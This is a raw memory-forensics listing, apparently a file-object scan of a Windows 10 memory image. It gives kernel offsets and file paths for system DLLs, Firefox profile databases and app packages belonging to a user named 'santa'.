+0x918b77128b10	\ProgramData\Packages\Microsoft.SkypeApp_kzf8qxf38zg5c\S-1-5-21-1046918562-1299961717-1331875240-1001\SystemAppData\Helium\UserClasses.dat	216
+0x918b77128ca0	\Windows\System32\en-US\netmsg.dll.mui	216
+0x918b77128e30	\Users\santa\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db	216
+0x918b77129150	\Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868	216
+0x918b77129470	\Windows\WinSxS\Manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f.manifest	216
+0x918b77129600	\Windows\System32\UserDataService.dll	216
+0x918b77129790	\Windows\System32\UserDataAccessRes.dll	216
+0x918b77129920	\Windows\System32\en-US\ESENT.dll.mui	216
+0x918b77129ab0	\Users\santa\AppData\Local\Comms\UnistoreDB\tmp.edb	216
+0x918b77129c40	\$Directory	216
+0x918b77129dd0	\Windows\System32\C_20127.NLS	216
+0x918b7712a0f0	\Windows\System32\WinSCard.dll	216
+0x918b7712a280	\$Directory	216
+0x918b7712a5a0	\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll	216
+0x918b7712a730	\Windows\System32\MessagingDataModel2.dll	216
+0x918b7712a8c0	\Windows\System32\PimIndexMaintenanceClient.dll	216
+0x918b7712aa50	\Users\santa\AppData\Local\Microsoft\GameDVR\KnownGameList.biny_8wekyb3d8bbwe\LocalCache\KnownGameList.bin	216
+0x918b7712ad70	\Windows\WinSxS\Manifests\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.18362.30_en-us_b74ea25d7e44006c.manifest	216
+0x918b7712b220	\Windows\System32\en-US\rundll32.exe.mui	216
+0x918b7712b540	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsStore_12107.1001.15.0_x64__8wekyb3d8bbwe\ActivationStore.dat	216
+0x918b7712b860	\Endpoint	216
+0x918b7712b9f0	\Windows\System32\dmprocessxmlfiltered.dll	216
+0x918b7712bb80	\Windows\System32\mydocs.dll	216
+0x918b7712c1c0	\Windows\Prefetch\DLLHOST.EXE-2C56D458.pf	216
+0x918b7712c350	\Windows\System32\sppcext.dll	216
+0x918b7712c4e0	\Users\santa\AppData\Roaming\Microsoft\Windows\Libraries\Documents.library-ms	216
+0x918b7712c670	\Windows\WinSxS\Catalogs	216
+0x918b7712c800	\Windows\System32\rundll32.exe	216
+0x918b7712c990	\Endpoint	216
+0x918b7712cb20	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsStore_12107.1001.15.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2	216
+0x918b7712ccb0	\Users\santa\AppData\Roaming\Microsoft\Windows\Libraries	216
+0x918b7712ce40	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsStore_12107.1001.15.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1	216
+0x918b7712d160	\Program Files\WindowsApps\Microsoft.UI.Xaml.2.4_2.42007.9001.0_x64__8wekyb3d8bbwe\resources.pri	216
+0x918b7712d480	\Program Files\WindowsApps\Microsoft.WindowsStore_12107.1001.15.0_x64__8wekyb3d8bbwe\resources.pri	216
+0x918b7712d610	\Endpoint	216
+0x918b7712d7a0	\$Directory	216
+0x918b7712d930	\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll	216
+0x918b7712dac0	\Program Files\WindowsApps\Microsoft.WindowsStore_12107.1001.15.0_x64__8wekyb3d8bbwe\WinStoreTasksWrapper.dll	216
+0x918b7712dc50	\ProgramData\Microsoft\Diagnosis\DownloadedSettings\telemetry.P-ARIA-194626ba46434f9ab441dd7ebda2aa64-5f64bebb-ac28-4cc7-bd52-570c8fe077c9-7717.json	216
+0x918b7712dde0	\Windows\System32\RuntimeBroker.exe	216
+0x918b7712e100	\Users\santa\AppData\Local\Mozilla\Firefox\Profiles\888jya8e.default-release\cache2\doomed\8084	216
+0x918b7712e420	\Windows\System32\icmp.dll	216
+0x918b7712e5b0	\$Directory	216
+0x918b7712e740	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\SiteSecurityServiceState.bin	216
+0x918b7712e8d0	\Windows\Fonts\arialbd.ttf	216
+0x918b7712ea60	\CMApi	216
+0x918b7712ed80	\Users\santa\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Settings\settings.dat	216
+0x918b7712f0a0	\gecko.4576.3988.3315572846900535200	216
+0x918b7712f230	\Program Files (x86)\Mozilla Firefox\firefox.exe	216
+0x918b7712f550	\Users\santa\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\Temp\mat-debug-6772.log	216
+0x918b7712f6e0	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\storage\default\https+++www.youtube.com\idb\1209553808LCo7g%sCD7a%t7adbca6s.sqlite	216
+0x918b7712f870	\Windows\WinSxS\Manifests\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.18362.30_en-us_b74ea25d7e44006c.manifest	216
+0x918b7712fa00	\Program Files (x86)\Mozilla Firefox	216
+0x918b7712fb90	\Users\santa\Videos\Captures\desktop.ini	216
+0x918b7712fd20	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\xulstore.json.tmp	216
+0x918b7712feb0	\Users\santa\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Settings\settings.dat.LOG1	216
+0x918b771301d0	\Users\santa\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Settings\settings.dat.LOG2	216
+0x918b771304f0	\color	216
+0x918b77130680	\CMNotify	216
+0x918b77130810	\Users\santa\AppData\Roaming\Microsoft\Windows\Recent\Pictures.lnk	216
+0x918b771309a0	\Users\santa\AppData\Local\Microsoft\Windows\Caches\cversions.1.db	216
+0x918b77130cc0	\Users\santa\AppData\Local\Mozilla\Firefox\Profiles\888jya8e.default-release\cache2\entries\4099E44A410522A31136010D97AEFFF69E14242D	216
+0x918b77130e50	\Windows\SysWOW64\imm32.dll	216
+0x918b77131170	\Users\santa\AppData\Local\Microsoft\EdgeUpdate\1.3.181.5\psuser.dll	216
+0x918b77131300	\Windows\SysWOW64\BitsProxy.dll	216
+0x918b77131490	\Users\santa\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1680_1050_POS4.jpg	216
+0x918b77131620	\Windows\System32\vm3ddevapi64.dll	216
+0x918b771317b0	\Windows\SysWOW64\mssprxy.dll	216
+0x918b77131940	\Users\santa\3D Objects\desktop.ini	216
+0x918b77131ad0	\MsFteWds	216
+0x918b77131c60	\$Directory	216
+0x918b77131df0	\Users\santa\AppData\Roaming\Microsoft\Windows\Libraries	216
+0x918b77132110	\Windows\System32	216
+0x918b771322a0	\Windows	216
+0x918b77132430	\Windows\SysWOW64\webio.dll	216
+0x918b771325c0	\CMApi	216
+0x918b77132750	\Windows\System32\RstrtMgr.dll	216
+0x918b771328e0	\wkssvc	216
+0x918b77132a70	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f	216
+0x918b77132d90	\Windows\System32\dlnashext.dll	216
+0x918b77133240	\Windows\SysWOW64\wldp.dll	216
+0x918b771333d0	\Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	216
+0x918b77133560	\Users\santa\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db	216
+0x918b771336f0	\Windows\Registration\R000000000006.clb	216
+0x918b77133880	\Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Crypto\TokenBindingKeys\Keys\887a471fc5377c5cbe6e38ac87d5a40f_65f5fb4f-5543-422b-b9c7-e8cc70c16fc6_775090f05efb4712c965fe90ed1ae5ce	216
+0x918b77133a10	\Windows\System32\vm3ddevapi64-release.dll	216
+0x918b77133ba0	\ProgramData\USOShared\Logs\NotificationUx.ceffb124-51f2-42a2-bc1d-50ec9d22051e.1.etl	216
+0x918b77133d30	\ProgramData\Microsoft\Diagnosis\DownloadedSettings\telemetry.P-ARIA-5476d0c4a7a347909c4b8a13078d4390-f8bdcecf-243f-40f8-b7c3-b9c44a57dead-7230.json	216
+0x918b771341e0	\Windows\System32\en-US\ieframe.dll.mui	216
+0x918b77134500	\Windows\System32\appraiser\Appraiser_Data.ini	216
+0x918b77134690	\ProgramData\Microsoft\Windows\AppRepository\Packages\microsoft.windowscommunicationsapps_16005.14326.21740.0_x64__8wekyb3d8bbwe\ActivationStore.dat	216
+0x918b771349b0	\Program Files (x86)\Mozilla Firefox	216
+0x918b77134b40	\Windows\Fonts\georgiai.ttf	216
+0x918b77134cd0	\ProgramData\USOShared\Logs\NotificationUx.f5a2effe-ee13-4166-9927-a4e70291e9c9.1.etl	216
+0x918b77134e60	\Windows\System32\dmclient.exe	216
+0x918b77135310	\Windows\System32	216
+0x918b771354a0	\Windows\Registration\R000000000006.clb	216
+0x918b77135630	\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21740.0_x64__8wekyb3d8bbwe\office.odf	216
+0x918b771357c0	\Users\santa\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog.etl	216
+0x918b77135950	\Windows\System32\en-US\propsys.dll.mui	216
+0x918b77135ae0	\Users\santa\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\TempState\d5a8f02229be41efb047bd8f883ba799.db.ses	216
+0x918b77135c70	\Windows\Prefetch\RUNTIMEBROKER.EXE-B2EBF44B.pf	216
+0x918b77135e00	\ProgramData\Microsoft\Diagnosis\DownloadedSettings\telemetry.P-ARIA-af397ef28e484961ba48646a5d38cf54-77418283-d6f6-4a90-b0c8-37e0f5e7b087-7425.json	216
+0x918b77136120	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f	216
+0x918b77136440	\Windows\System32\en-US\windows.storage.dll.mui	216
+0x918b77136760	\Windows\System32\WinMetadata\Windows.System.winmd	216
+0x918b771368f0	\Program Files (x86)\Mozilla Firefox	216
+0x918b77136c10	\$Directory	216
+0x918b77136da0	\ProgramData\Microsoft\Windows\AppRepository\Packages\microsoft.windowscommunicationsapps_16005.14326.21740.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1	216
+0x918b77137250	\ProgramData\Microsoft\Windows\AppRepository\Packages\microsoft.windowscommunicationsapps_16005.14326.21740.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2	216
+0x918b771373e0	\Users\santa\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxStore.hxd	216
+0x918b77137570	\Windows\TextInput\WindowsInternal.ComposableShell.Experiences.TextInput.dll	216
+0x918b77137890	\Windows\System32\svchost.exe	216
+0x918b77137a20	\Sessions\1\AppContainerNamedObjects\S-1-15-2-3945102849-3632965805-3846928828-240845225-3300287824-62672950-817265009	216
+0x918b77137bb0	\Windows	216
+0x918b77137d40	\ProgramData\Microsoft\Windows\AppRepository\Packages\InputApp_1000.18362.1.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat	216
+0x918b77137ed0	\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21740.0_x64__8wekyb3d8bbwe\en-us\hxcommintl.dll	216
+0x918b771381f0	\ProgramData\Microsoft\Windows Defender\Definition Updates\{D62DB865-2BF3-4866-A4B8-E44E0FC98F75}\mpengine.dll	216
+0x918b77138380	\Windows\rescache\_merged\2780983867\144070116.pri	216
+0x918b77138510	\ProgramData\Microsoft\Diagnosis\DownloadedSettings\telemetry.P-ARIA-d5a8f02229be41efb047bd8f883ba799-59258264-451c-4459-8c09-75d7d721219a-7112.json	216
+0x918b771386a0	\Windows\SystemResources\TextInput\TextInput.pri	216
+0x918b77138830	\ProgramData\Microsoft\Windows\AppRepository\Packages\InputApp_1000.18362.1.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1	216
+0x918b771389c0	\ProgramData\Microsoft\Windows\AppRepository\Packages\InputApp_1000.18362.1.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2	216
+0x918b77138b50	\$Directory	216
+0x918b77138ce0	\Windows\Fonts\segoeui.ttf	216
+0x918b77138e70	\ProgramData\Microsoft\Windows\AppRepository\Packages\InputApp_1000.18362.1.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat	216
+0x918b77139190	\Windows\SystemApps\InputApp_cw5n1h2txyewy\WindowsInternal.ComposableShell.Experiences.TextInput.InputApp.exe	216
+0x918b77139320	\Windows\SystemApps\InputApp_cw5n1h2txyewy\resources.pri	216
+0x918b771394b0	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\places.sqlite	216
+0x918b771397d0	\Windows\System32\en-US\windows.applicationmodel.datatransfer.dll.mui	216
+0x918b77139960	\Windows\SystemApps\InputApp_cw5n1h2txyewy	216
+0x918b77139af0	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\places.sqlite-wal	216
+0x918b77139c80	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\favicons.sqlite	216
+0x918b77139e10	\$Directory	216
+0x918b7713a130	\Windows\rescache\_merged\248604377\958443649.pri	216
+0x918b7713a2c0	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\favicons.sqlite-wal	216
+0x918b7713a450	\$Directory	216
+0x918b7713a5e0	\$Directory	216
+0x918b7713a770	\Users\santa\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat	216
+0x918b7713a900	\LOCAL\cubeb-pipe-4576-9	216
+0x918b7713aa90	\Users\santa\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG2	216
+0x918b7713ac20	\Program Files (x86)\Mozilla Firefox\firefox.exe	216
+0x918b7713adb0	\Users\santa\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG1	216
+0x918b7713b0d0	\Windows\DiagTrack\utc.allow.diffbase	216
+0x918b7713b260	\Windows\Prefetch\SVCHOST.EXE-EAE9B60B.pf	216
+0x918b7713b580	\Windows\System32\shutdownux.dll	216
+0x918b7713b710	\ProgramData\Microsoft\Diagnosis\DownloadedSettings\utc.cert.json	216
+0x918b7713b8a0	\Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\Flighting\FlightingLogging.txt	216
+0x918b7713c200	\Windows\System32\WinMetadata\Windows.UI.winmd	216
+0x918b7713c390	\Windows\TextInput\WindowsInternal.ComposableShell.Experiences.TextInput.LayoutData.dll	216
+0x918b7713c520	\1840.1da1a23c79ec4cf	216
+0x918b7713c6b0	\Windows\SysWOW64\edputil.dll	216
+0x918b7713c840	\Windows\System32\en-US\winnlsres.dll.mui	216
+0x918b7713c9d0	\ProgramData\Microsoft\Diagnosis\DownloadedSettings\utc.allow.json	216
+0x918b7713cb60	\Windows\System32\en-US\KernelBase.dll.mui	216
+0x918b7713ccf0	\Windows\System32\wdscore.dll	216
+0x918b7713d1a0	\Users\santa\AppData\Local\Packages\InputApp_cw5n1h2txyewy\Settings\settings.dat	216
+0x918b7713d330	\Users\santa\AppData\Local\Packages\InputApp_cw5n1h2txyewy\Settings\settings.dat.LOG1	216
+0x918b7713d4c0	\Users\santa\AppData\Local\Packages\InputApp_cw5n1h2txyewy\Settings\settings.dat.LOG2	216
+0x918b7713d7e0	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\AlternateServices.bin	216
+0x918b7713d970	\gecko.4576.3988.11800597154050836485	216
+0x918b7713de20	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\storage\default\https+++www.youtube.com\idb\4167130407yCt7G%cCf7C%o7ndfci6g.sqlite-shm	216
+0x918b7713e2d0	\CMApi	216
+0x918b7713e460	\gecko.4576.3988.1641067702936654701	216
+0x918b7713e5f0	\Windows\SysWOW64\rometadata.dll	216
+0x918b7713e780	\Windows\System32	216
+0x918b7713edc0	\gecko.4576.3988.1641067702936654701	216
+0x918b7713f0e0	\gecko.4576.3988.7552850740276905925	216
+0x918b7713f270	\gecko.4576.3988.7552850740276905925	216
+0x918b7713f590	\ProgramData\Microsoft\Windows\OneSettings\config.json	216
+0x918b7713f720	\Windows\System32\en-US\sppsvc.exe.mui	216
+0x918b7713f8b0	\Program Files (x86)\Mozilla Firefox\firefox.exe	216
+0x918b7713fd60	\Endpoint	216
+0x918b77140080	\Windows\Fonts\segoeuib.ttf	216
+0x918b77140530	\Windows\System32\wlidsvc.dll	216
+0x918b771406c0	\Windows\SysWOW64\schannel.dll	216
+0x918b771411b0	\Program Files (x86)\Mozilla Firefox	216
+0x918b77141340	\Program Files (x86)\Mozilla Firefox	216
+0x918b77141660	\Windows\SysWOW64\dpapi.dll	216
+0x918b771417f0	\$Directory	216
+0x918b77141980	\gecko.4576.3988.4692312835060683011	216
+0x918b77141b10	\Windows	216
+0x918b786bd1e0	\Windows\System32\en-US\winnlsres.dll.mui	216
+0x918b786bd370	\Windows\ImmersiveControlPanel	216
+0x918b786bd500	\Windows\System32	216
+0x918b786bd690	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f	216
+0x918b786bd820	\$Directory	216
+0x918b786bd9b0	\$Directory	216
+0x918b786bdb40	\Windows\SystemResources\notepad.exe.mun	216
+0x918b786bdcd0	\Windows\Fonts\StaticCache.dat	216
+0x918b786bde60	\Windows\System32\en-US\notepad.exe.mui	216
+0x918b786be180	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f	216
+0x918b786be4a0	\Windows\Registration\R000000000006.clb	216
+0x918b786be630	\$Directory	216
+0x918b786be7c0	\$Directory	216
+0x918b786be950	\LOCAL\cubeb-pipe-4576-1	216
+0x918b786beae0	\Windows\SysWOW64\directmanipulation.dll	216
+0x918b786bec70	\CMApi	216
+0x918b786bee00	\Windows\System32\en-US\svchost.exe.mui	216
+0x918b786bf120	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f	216
+0x918b786bf2b0	\Windows\rescache\_merged\2421516671\2126941428.pri	216
+0x918b786bf440	\Windows\Fonts\tahoma.ttf	216
+0x918b786bf5d0	\Windows\System32\en-US\ShutdownUX.dll.mui	216
+0x918b786bfc10	\LOCAL\cubeb-pipe-4576-1	216
+0x918b786c00c0	\Windows\Fonts\tahoma.ttf	216
+0x918b786c0570	\Dev\Query	216
+0x918b786c0700	\$Directory	216
+0x918b786c0890	\$Directory	216
+0x918b786c0a20	\ProgramData\Microsoft\Windows\AppRepository\Packages\windows.immersivecontrolpanel_10.0.2.1000_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1	216
+0x918b786c0bb0	\$Directory	216
+0x918b786c0d40	\ProgramData\Microsoft\Windows\AppRepository\Packages\windows.immersivecontrolpanel_10.0.2.1000_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2	216
+0x918b786c0ed0	\Endpoint	216
+0x918b786c11f0	\Windows\System32\Winlangdb.dll	216
+0x918b786c1380	\$Directory	216
+0x918b786c16a0	\Windows\ImmersiveControlPanel\SystemSettings.dll	216
+0x918b786c1830	\ProgramData\Microsoft\Windows\AppRepository\Packages\windows.immersivecontrolpanel_10.0.2.1000_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat	216
+0x918b786c19c0	\$Directory	216
+0x918b786c1b50	\Windows\SystemResources\Windows.UI.SettingsAppThreshold\pris\Windows.UI.SettingsAppThreshold.en-US.pri	216
+0x918b786c2190	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f	216
+0x918b786c2640	\Windows\Fonts\verdana.ttf	216
+0x918b786c2960	\ProgramData\Microsoft\Windows\AppRepository\StateRepository-Machine.srd	216
+0x918b786c2af0	\Program Files (x86)\Mozilla Firefox\browser\features\pictureinpicture@mozilla.org.xpi	216
+0x918b786c2c80	\Windows\ImmersiveControlPanel\en-US\SystemSettings.exe.mui	216
+0x918b786c2e10	\Windows\Fonts\trebucbi.ttf	216
+0x918b786c3130	\CMApi	216
+0x918b786c32c0	\Dev\Query	216
+0x918b786c3450	\Windows\System32\en-US\sechost.dll.mui	216
+0x918b786c3770	\Windows\System32	216
+0x918b786c3a90	\Windows\System32\en-US\KernelBase.dll.mui	216
+0x918b786c3c20	\Windows\System32\WinMetadata\Windows.UI.winmd	216
+0x918b786c3db0	\$Directory	216
+0x918b786c4580	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ContentDeliveryManager_10.0.18362.1_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat	216
+0x918b786c4710	\Windows\System32\en-US\crypt32.dll.mui	216
+0x918b786c48a0	\Windows\System32\RuntimeBroker.exe	216
+0x918b786c4bc0	\Endpoint	216
+0x918b786c59d0	\Windows\System32\en-US\propsys.dll.mui	216
+0x918b786c5b60	\ProgramData\Microsoft\Windows Defender\Platform\4.18.23100.2009-0\MpCmdRun.exe	216
+0x918b786c5e80	\Windows\System32\en-US\mswsock.dll.mui	216
+0x918b786c6330	\Windows\System32\en-US\combase.dll.mui	216
+0x918b786c6650	\Windows\System32	216
+0x918b786c6970	\Windows\SysWOW64\rmclient.dll	216
+0x918b786c6b00	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f	216
+0x918b786c6c90	\Windows\SysWOW64\dwmapi.dll	216
+0x918b786c6e20	\Windows\System32\wbiosrvc.dll	216
+0x918b786c7140	\Users\santa\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db	216
+0x918b786c7460	\Windows\System32	216
+0x918b786c75f0	\Server	216
+0x918b786c7910	\Windows\System32\winbioext.dll	216
+0x918b786c7aa0	\CMApi	216
+0x918b786c7c30	\Windows\SysWOW64\Windows.UI.Immersive.dll	216
+0x918b786c7dc0	\$Directory	216
+0x918b786c80e0	\Windows\SysWOW64\DXCore.dll	216
+0x918b786c8400	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\AC\Temp\aria-debug-804.log	216
+0x918b786c8590	\Windows\System32\CryptoWinRT.dll	216
+0x918b786c8a40	\Users\santa\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db	216
+0x918b786c8bd0	\Windows\System32\spp.dll	216
+0x918b786c8d60	\Windows\System32\en-US\KernelBase.dll.mui	216
+0x918b786c8ef0	\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	216
+0x918b786c9530	\Windows\System32\InstallService.dll	216
+0x918b786c96c0	\	216
+0x918b786c9850	\Windows\Registration\R000000000006.clb	216
+0x918b786c99e0	\Windows\System32\en-US\KernelBase.dll.mui	216
+0x918b786c9b70	\Windows\System32\en-US\UIRibbon.dll.mui	216
+0x918b786c9e90	\$Directory	216
+0x918b786ca1b0	\Windows\System32\en-US\propsys.dll.mui	216
+0x918b786ca340	\$Directory	216
+0x918b786ca4d0	\$Directory	216
+0x918b786ca660	\Windows\System32\SearchFolder.dll	216
+0x918b786ca980	\$Directory	216
+0x918b786caca0	\Users\santa\AppData\Local\Microsoft\Windows\Safety\edge\remote\synchronousLookupUris_638358601691205476	216
+0x918b786cae30	\Windows\SysWOW64\Windows.Globalization.dll	216
+0x918b786cb150	\Windows\System32\en-US\combase.dll.mui	216
+0x918b786cb2e0	\$Directory	216
+0x918b786cb600	\$Directory	216
+0x918b786cb920	\Windows\Registration\R000000000006.clb	216
+0x918b786cbc40	\Users\santa\AppData\Local\Microsoft\Windows\Safety\edge\remote\topTraffic_638004170464094982	216
+0x918b786cbdd0	\Users\santa\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db	216
+0x918b786cc410	\Windows\SysWOW64\mscms.dll	216
+0x918b786cc5a0	\Program Files (x86)\Mozilla Firefox\browser\omni.ja	216
+0x918b786cc8c0	\Users\santa\AppData\Local\Microsoft\Windows\Safety\edge\remote\script_300161259571223429446516194326035503227.rel.v2	216
+0x918b786cca50	\Users\santa\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db	216
+0x918b786ccbe0	\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_6.0.1.0_x64__8wekyb3d8bbwe\Microsoft.Apps.Stubs.Handoff.dll	216
+0x918b786ccd70	\Windows\SysWOW64\coloradapterclient.dll	216
+0x918b786cd090	\Program Files\WindowsApps\Microsoft.VCLibs.140.00_14.0.32530.0_x64__8wekyb3d8bbwe\vcruntime140_1_app.dll	216
+0x918b786cd220	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db-wal	216
+0x918b786cd3b0	\Program Files\WindowsApps\Microsoft.VCLibs.140.00_14.0.32530.0_x64__8wekyb3d8bbwe\msvcp140_app.dll	216
+0x918b786cd540	\$Directory	216
+0x918b786cd6d0	\$Directory	216
+0x918b786cd860	\Windows\System32\notepad.exe	216
+0x918b786cd9f0	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db-shm	216
+0x918b786cdb80	\$Directory	216
+0x918b786cdd10	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\User\Default\CacheStorage\CacheStorage.jfm	216
+0x918b786cdea0	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\Settings\settings.dat.LOG1	216
+0x918b786ce1c0	\Windows\Fonts\verdanai.ttf	216
+0x918b786ce350	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\Settings\settings.dat	216
+0x918b786ce4e0	\$Directory	216
+0x918b786ce670	\Windows\Prefetch\CMD.EXE-CD245F9E.pf	216
+0x918b786ce800	\Windows\Fonts\verdanaz.ttf	216
+0x918b786ce990	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db	216
+0x918b786cecb0	\Windows\SysWOW64\dcomp.dll	216
+0x918b786cee40	\$Directory	216
+0x918b786cf160	\$Directory	216
+0x918b786cf2f0	\Windows\System32\webplatstorageserver.dll	216
+0x918b786cf480	\Windows\System32\dllhost.exe	216
+0x918b786cf610	\$Directory	216
+0x918b786cf7a0	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db	216
+0x918b786cf930	\Windows\Fonts\verdanab.ttf	216
+0x918b786cfac0	\Sessions\1\AppContainerNamedObjects\S-1-15-2-2226957697-3030467180-2301525-4248967783-2024719031-2325529081-2915787518	216
+0x918b786d0100	\Windows\System32\winevt\Logs\Microsoft-Windows-Biometrics%4Operational.evtx	216
+0x918b786d0290	\$Directory	216
+0x918b786d0420	\Program Files (x86)\Mozilla Firefox\firefox.exe	216
+0x918b786d05b0	\Reference	216
+0x918b786d0740	\Windows\System32\conhost.exe	216
+0x918b786d08d0	\Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-1046918562-1299961717-1331875240-1001-MergedResources-1.pri	216
+0x918b786d0d80	\Windows\System32\en-US\wscapi.dll.mui	216
+0x918b786d10a0	\Windows\System32\amsiproxy.dll	216
+0x918b786d1230	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\Settings\settings.dat.LOG2	216
+0x918b786d13c0	\$Directory	216
+0x918b786d1550	\Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe	216
+0x918b786d16e0	\CMApi	216
+0x918b786d1a00	\Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\Microsoft.Photos.dll	216
+0x918b786d1eb0	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\cookies.sqlite	216
+0x918b786d2360	\$Directory	216
+0x918b786d24f0	\Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe	216
+0x918b786d2680	\Windows\System32\Windows.Media.MediaControl.dll	216
+0x918b786d2810	\Windows\System32\en-US\dui70.dll.mui	216
+0x918b786d29a0	\Windows\System32	216
+0x918b786d2b30	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!002\MicrosoftEdge\MSIMGSIZ.DAT	216
+0x918b786d2e50	\Windows\SysWOW64\BCP47Langs.dll	216
+0x918b786d3170	\Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\resources.pri	216
+0x918b786d3490	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f	216
+0x918b786d37b0	\Windows\Registration\R000000000006.clb	216
